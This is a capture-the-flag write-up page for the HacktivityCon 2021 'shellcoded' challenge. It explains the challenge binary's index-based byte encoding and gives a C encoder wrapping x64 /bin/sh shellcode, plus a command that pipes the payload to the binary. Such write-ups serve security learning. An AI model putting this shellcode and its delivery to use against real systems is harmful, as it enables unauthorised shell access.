💻
0xTen
  • Intro
  • 🚩CTFs
  • Hackthebox👽
    • Boxes
      • Attended
    • Challenges
      • knote
    • Business Ctf
      • 2022
        • Midenios
  • UHC🔮
    • Quals
      • 8th Edition
        • Super Secret Password
        • Trampoline
        • I like to buy or smth
  • pwnable.kr🐱
    • Toddler's Bottle
      • fd
      • bof
      • random
      • uaf
  • Boitatech🐍
    • 2021
      • bankapp
  • DEFCON☠️
    • 2022
      • Quals
        • Smuggler's Cove
  • RealWorld CTF🐉
    • 2022
  • Dice CTF 🎲
    • 2022
      • babyrop
    • 2023
  • Insomnihack💀
    • 2022
  • ClearSale CTF🏆
    • 2021
      • Secret Notes
      • Esse Esse Erre Effe
      • Fresca Soda
      • Healthchecker
  • InCTF🏆
    • 2021
      • Ancient House
  • ASIS CTF🏆
    • 2020
      • Shared house
    • 2021
      • Mini Memo
  • N1CTF🏆
    • 2021
      • babyguess
  • HacktivityCon🏆
    • 2021
      • faucet
      • pawned
      • retcheck
      • shellcoded
      • the library
      • yabo
  • 🖥️Pwn
    • ROP↩️
      • x64 ret2libc
    • Heap⛰️
      • jemalloc
      • Fastbin dup - 2.31
      • Chunk Overlapping - 2.31
      • phoenix
        • heap-zero
          • i486
        • heap-one
          • i486
    • Format strings🩸
      • Blind
    • Kernel🌽
    • Browser🤖
  • 🕸️Web
    • SQLi💉
      • Blind (Boolean Based)
Powered by GitBook
On this page
  • Files
  • The binary
  • Enconding
  • Final Exploit

Was this helpful?

  1. HacktivityCon🏆
  2. 2021

shellcoded

shellcoded was mostly a easy reversing challenge rather then pwn since you only had to reverse the encoding applied to the shellcode.

PreviousretcheckNextthe library

Last updated 3 years ago

Was this helpful?

Files

The binary

The binary does exactly what it says it does, runs your shellcode, but there is obviously a catch.

Enconding

This code will loop through the shellcode and, for each position, if it the index is an even number it will add 1 * the index to the byte on that position, if it's an odd number, then it adds -1 * the index to the byte. All we have to do to properly encode our shellcode is to do the same process, but subtracting instead of adding.

I wrote the following encoder for my shellcode:

#include <stdio.h>
#include <string.h>

// x64 /bin/sh shellcode
unsigned char shellcode[] = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";

int main(){
    int i;
    int v3;
    for (i = 0; strlen(shellcode) > i; i++){
        if ( (i & 1) != 0 ){
            v3 = -1;
        } else{
            v3 = 1;
        }
        shellcode[i] -= v3 * i;
    }
    printf(shellcode);
    
}

It's notable that I basically copied and pasted the original loop but replaced += with -= beacuse I want to do do the opposite operation.

Final Exploit

After generating my shellcode and saving it to a file I called payload.bin, I simply used the following command to send it over.

(cat ./payload.bin; cat) | ./shellcoded

CTFs/hacktivitycon/2021/shellcoded at main · 0xTen/CTFsGitHub
Logo